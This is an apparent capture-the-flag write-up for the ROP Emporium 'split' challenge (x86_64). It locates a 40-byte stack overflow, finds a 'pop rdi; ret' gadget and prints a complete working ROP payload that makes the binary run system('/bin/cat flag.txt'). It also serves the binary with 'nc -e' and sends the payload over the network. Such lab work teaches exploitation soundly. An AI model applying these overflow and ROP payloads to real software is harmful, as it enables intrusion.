ropemporium: split and callme writeup
It sounds kinda weird when you say it like that..
This is going to be an analysis of the ROP Emporium split puzzle solution along with callme, for the x86_64 platform. I prefer to rely mostly on unix tools you’d find available on any box, simply because they’re the most re-usable for any other work you do. Presumably you have other reasons to be analyzing ELF binaries? Either way, it doesn’t matter, read on.
By the way this post will be a SPOILER so don’t read it unless you want that. Maybe give it a try first! Or don’t, none of my business.
intro
A quick introduction to the site: ROP Emporium provides a binary and a flag file, and your goal is to run the binary with an input such that it prints out the contents of the flag file. It’s obviously built like a program that’s not meant to do that, but the binary is structured in such a way that it contains the gadgets necessary to print out that file.
Each challenge requires you to analyze the binary and redirect execution by precisely manipulating the stack entries.
There are other hints provided, for example: you’re on a website called ROP Emporium and you already know the class of vulnerability you’re looking for. Also they conveniently mention the instruction pointer can be overwritten by a buffer overflow consisting of 40 bytes.
buffer overflow
Let’s say you didn’t know that though. Clear the kernel ring buffer:
sudo dmesg -C
and start feeding in strings of different lengths. Once you get to 40, the program crashes.
BOF=$(perl -E 'say "X" x 40')
echo "${BOF}" | ./split
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...
> Thank you!
[1] 6850 done echo "${BOF}" |
6851 illegal hardware instruction (core dumped) ./split
dmesg now shows you
$ sudo dmesg -t
traps: split[6851] trap invalid opcode ip:40060f sp:7ffee0498f60 error:0 in split[400000+1000]
But if you add, for instance, five ‘A’s to the end, you’ll see we are beginning to overwrite the instruction pointer:
echo "${BOF}AAAAA" | ./split
...
sudo dmesg -t
split[6875]: segfault at a4141414141 ip 00000a4141414141 sp 00007ffdff9f12a0 error 14 likely on CPU 1 (core 1, socket 0)
Code: Unable to access opcode bytes at 0xa4141414117.
See all those 41s? Verify on asciitable.com that 0x41 is “A”. The 0a in front of them is the newline that echo appends to the string.
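Also verify that you get the exact same results if you encode the ascii characters yourself with the hexadecimal representation of that same string (this relies on an echo that expands \x escapes, as the zsh builtin does; in bash you’d need echo -e or printf):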
echo "${BOF}\x41\x41\x41\x41\x41" | ./split
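If you'd rather not trust a website for this, the same check can be done in a couple of lines of Python. This is just a sanity-check sketch; the variable names are mine and nothing here touches the binary.

```python
# Check that byte 0x41 is the ASCII letter "A", and that the literal and
# escaped spellings of the five-byte suffix are the same bytes.
suffix_literal = b"AAAAA"
suffix_escaped = b"\x41\x41\x41\x41\x41"

print(chr(0x41))
print(suffix_literal == suffix_escaped)

# echo appends a newline (0x0a) after the suffix, which is where the
# extra "0a" in the dmesg address comes from.
sent = suffix_literal + b"\n"
print(sent.hex())
```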
little endian
We know something more meaningful will have to go there, but before we figure out what that is, let’s explore how we would write it there if we did know it. Instead of all 41s, let’s put in 0x41 - 0x45 to see how it shows up in dmesg.
echo "${BOF}\x41\x42\x43\x44\x45" | ./split
sudo dmesg -t
split[7815]: segfault at a4544434241 ip 00000a4544434241 sp 00007ffc83aa4580 error 14 likely on CPU 4 (core 4, socket 0)
Code: Unable to access opcode bytes at 0xa4544434217.
So our input was 41 42 43 44 45 and the address in dmesg reads 45 44 43 42 41: the bytes sit in memory in the order we sent them, but the CPU reads them as a little-endian number, so they appear reversed.
Endianness describes which end of a multi-byte number comes first in memory. In the representation "1024" we read "one thousand" first and "four" last, most significant part first, so that would be big-endian. In little-endian, the least significant byte comes first, at the lowest address.
Put a pin in that for now while we figure out what needs to go there.
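To see the byte order without crashing anything, here is a small Python sketch that reads our input bytes as a number both ways, then goes the other direction and packs an address into 8 little-endian bytes. The variable names are mine; the values come from the dmesg output above and from a gadget address that shows up later in this post.

```python
import struct

# The five bytes we sent, plus the newline that echo appends.
raw = bytes([0x41, 0x42, 0x43, 0x44, 0x45, 0x0A])

# Read the same bytes as a number, first byte least significant (little)
# and first byte most significant (big).
as_little = int.from_bytes(raw, "little")
as_big = int.from_bytes(raw, "big")
print(hex(as_little))  # matches the address dmesg reported
print(hex(as_big))

# Going the other way: pack a 64-bit address as 8 little-endian bytes.
packed = struct.pack("<Q", 0x4007C3)
print(packed.hex(" "))
```

The top two bytes of the saved return address were never overwritten and stay zero, which is why dmesg shows 00000a4544434241.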
analyzing the split binary
The first thing we can do is look for interesting function names. I like to use the nm tool to list symbols. If we grep for the symbols labeled with a ’t’, we get function names which reside in the “text” portion of the binary.
nm split | grep ' t'
00000000004005f0 t deregister_tm_clones
0000000000400660 t __do_global_dtors_aux
0000000000400690 t frame_dummy
00000000004006e8 t pwnme
0000000000400620 t register_tm_clones
0000000000400742 t usefulFunction
usefulFunction sounds useful.
You can also see that there’s a usefulString by searching the data section:
nm split | grep ' D'
0000000000601050 D __data_start
0000000000601058 D __dso_handle
0000000000601072 D _edata
0000000000601078 D __TMC_END__
0000000000601060 D usefulString
What’s happening within usefulFunction? We can use gdb to figure that out. Use the disass command to disassemble the function we’re curious about:
gdb -q split
(No debugging symbols found in split)
(gdb) disass usefulFunction
Dump of assembler code for function usefulFunction:
0x0000000000400742 <+0>: push rbp
0x0000000000400743 <+1>: mov rbp,rsp
0x0000000000400746 <+4>: mov edi,0x40084a
0x000000000040074b <+9>: call 0x400560 <system@plt>
0x0000000000400750 <+14>: nop
0x0000000000400751 <+15>: pop rbp
0x0000000000400752 <+16>: ret
End of assembler dump.
Or get the same info with objdump:
objdump -D split
[SNIP]
0000000000400742 <usefulFunction>:
400742: 55 push %rbp
400743: 48 89 e5 mov %rsp,%rbp
400746: bf 4a 08 40 00 mov $0x40084a,%edi
40074b: e8 10 fe ff ff call 400560 <system@plt>
400750: 90 nop
400751: 5d pop %rbp
400752: c3 ret
400753: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)
40075a: 00 00 00
40075d: 0f 1f 00 nopl (%rax)
[/SNIP]
So system is being called with something, and the call is landing in the PLT (procedure linkage table). This is a lookup table the ELF format uses to enable lazy binding of external calls, and since we know the virtual address of the stub that ends up there we don’t need to go too deep in understanding exactly how it works.
What’s it being called with? On x86_64, the rdi register holds the first argument to a function, which here is the argument to system. (The disassembly writes to edi, which is the lower 32 bits of rdi; writing to edi zeroes the upper 32 bits, so for this address the effect is the same.) gdb can also tell us what’s being loaded into that register in the line right above the call to system, with the x/s or “examine as string” command:
(gdb) x/s 0x40084a
0x40084a: "/bin/ls"
Okay! So usefulFunction is calling system("/bin/ls"). What we need to do is execute this line but with a different string in the rdi register. Maybe one that prints the flag.txt file?
Remember we already saw a usefulString in the data section, what’s in that? gdb can tell us that too in the same way.
(gdb) x/s 0x601060
0x601060 <usefulString>: "/bin/cat flag.txt"
Perfect!
ROP chain
So the goal is to execute the system call with the usefulString loaded into the rdi register instead of what the program is loading in. This is the perfect target for a ROP gadget.
If we could find a gadget which pops the next stack value into rdi and returns,
pop rdi
ret
then we could write the address of that gadget onto the stack (overwriting the saved return address), and put the address of the /bin/cat flag.txt string right after it, so it ends up in rdi. And then right after that, we’d put the address of the system call, so that the gadget’s ret would go there and execute system("/bin/cat flag.txt").
finding ROP gadgets
Here I must admit, I’m a bit of a fraud. Having already extolled the virtue and purity of using only builtin unix tools for our analysis, I have to concede there are simply better toolsets when it comes to analyzing a binary for ROP gadgets.
So I wussed out and used Ropper, which is a Python framework for disassembly and binary analysis. If anyone has better ideas please email me. Nevertheless, the mighty Snake provides:
ropper --file split | grep rdi
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
0x00000000004006d4: add byte ptr [rax], al; add byte ptr [rdi + 0x400806], bh; call 0x550; mov eax, 0; pop rbp; ret;
0x00000000004006d6: add byte ptr [rdi + 0x400806], bh; call 0x550; mov eax, 0; pop rbp; ret;
0x00000000004007c3: pop rdi; ret;
This last entry is exactly what we said we needed.
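For the curious, a gadget this short can also be found with a plain byte search, since `pop rdi` assembles to the single byte 5f and `ret` to c3. Below is a rough Python sketch of that idea. The function name `find_gadget` and the default base address are my own assumptions: the base 0x400000 matches the `split[400000+1000]` mapping dmesg printed earlier, and the sketch assumes file offset 0 is mapped there. It is nowhere near a replacement for Ropper, as it scans the whole file, including bytes that are never mapped executable, so every hit needs checking.

```python
def find_gadget(image: bytes, pattern: bytes, base: int = 0x400000):
    """Return the virtual addresses where `pattern` occurs in `image`.

    Assumes (hypothetically) that file offset 0 is mapped at `base`,
    and does not check whether a hit lies in an executable segment.
    """
    hits = []
    start = image.find(pattern)
    while start != -1:
        hits.append(base + start)
        start = image.find(pattern, start + 1)
    return hits


POP_RDI_RET = bytes([0x5F, 0xC3])  # machine code for `pop rdi; ret`

# Against the real binary it would look something like this:
# with open("split", "rb") as f:
#     print([hex(a) for a in find_gadget(f.read(), POP_RDI_RET)])

# Synthetic demo: `pop r15; ret` is 41 5f c3, so jumping one byte into it
# decodes as `pop rdi; ret`.
demo = bytes([0x90, 0x41, 0x5F, 0xC3])
demo_hits = find_gadget(demo, POP_RDI_RET)
print([hex(a) for a in demo_hits])
```

The demo also hints at why gadgets like this exist at all: nobody wrote `pop rdi; ret` on purpose, it is the tail end of a longer instruction.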
the plan
So we have a buffer overflow in pwnme, and our ROP chain will need to:
- Overwrite the return address with the address of the ROP gadget
- The ROP gadget will take whatever’s next on the stack and place it in rdi
- The ROP gadget will then return using the next address on the stack, which needs to be the system call.
The address we use for the system call is that of the call system@plt instruction inside usefulFunction, 0x40074b, which we found in the disassembly earlier.
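If it helps to see the plan move, here is a toy model of it in Python. The three addresses are the ones found in this post; everything else (the `run_chain` function, the dictionary of registers) is made up for illustration and only mimics how `ret` and `pop rdi` consume 8-byte stack entries in order.

```python
POP_RDI_RET = 0x4007C3    # the gadget Ropper found
USEFUL_STRING = 0x601060  # address of "/bin/cat flag.txt"
CALL_SYSTEM = 0x40074B    # the call to system@plt inside usefulFunction


def run_chain(stack):
    """Simulate `ret` and `pop rdi; ret` consuming stack entries in order."""
    stack = list(stack)
    regs = {"rdi": 0}
    trace = []
    rip = stack.pop(0)  # the function's own `ret` pops our overwritten return address
    while True:
        if rip == POP_RDI_RET:
            regs["rdi"] = stack.pop(0)  # pop rdi
            trace.append(f"pop rdi -> {regs['rdi']:#x}")
            rip = stack.pop(0)          # ret
        elif rip == CALL_SYSTEM:
            trace.append(f"call system(rdi={regs['rdi']:#x})")
            return regs, trace
        else:
            raise ValueError(f"unmapped address {rip:#x}")


regs, trace = run_chain([POP_RDI_RET, USEFUL_STRING, CALL_SYSTEM])
print("\n".join(trace))
```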
payload
The payload will be <overflow string> + <gadget address> + <useful string address> + <system@plt call>
Each stack entry is 8 bytes wide, so 0x004007c3 is really 0x00000000004007c3. When you incorporate the addresses into the payload in little-endian order, the zero padding ends up at the end.
Look up the ascii characters, if they are printable, at https://asciitable.com. Some of them are. I like to set up a table to do all parts of the 64-bit address construction.
Structure | Address | Reversed bytes | Payload bytes |
---|---|---|---|
rop gadget | 0x004007c3 | c3 07 40 | \xc3\x07@\x00\x00\x00\x00\x00 |
cat flag string | 0x00601060 | 60 10 60 | `\x10`\x00\x00\x00\x00\x00 |
system@plt call | 0x0040074b | 4b 07 40 | K\x07@\x00\x00\x00\x00\x00 |
Now our final payload will be:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc3\x07@\x00\x00\x00\x00\x00`\x10`\x00\x00\x00\x00\x00K\x07@\x00\x00\x00\x00\x00
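If doing the byte reversal by hand feels error-prone, the same payload can be assembled in Python with `struct.pack`. This is only a sketch: the helper name `p64` is my own choice, and the addresses are the three from the table above.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an address as 8 little-endian bytes, zero padded."""
    return struct.pack("<Q", value)


payload = (
    b"A" * 40        # filler up to the saved return address
    + p64(0x4007C3)  # pop rdi; ret
    + p64(0x601060)  # address of "/bin/cat flag.txt"
    + p64(0x40074B)  # call system@plt inside usefulFunction
)

print(len(payload))
print(payload)
```

To feed it to the binary you would write the raw bytes out with `sys.stdout.buffer.write(payload)` instead of `print`, and pipe the script into ./split.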
Let’s run it:
echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc3\x07@\x00\x00\x00\x00\x00`\x10`\x00\x00\x00\x00\x00K\x07@\x00\x00\x00\x00\x00' | ./split
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...
> Thank you!
ROPE{a_placeholder_32byte_flag!}
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...
> Thank you!
Exiting
[1] 33579 done echo |
33580 segmentation fault (core dumped) ./split
We can also run our split executable over a connection!
nc -lvp 9999 -e ./split
and in another terminal
echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc3\x07@\x00\x00\x00\x00\x00`\x10`\x00\x00\x00\x00\x00K\x07@\x00\x00\x00\x00\x00' | nc localhost 9999
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...
> Thank you!
ROPE{a_placeholder_32byte_flag!}
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...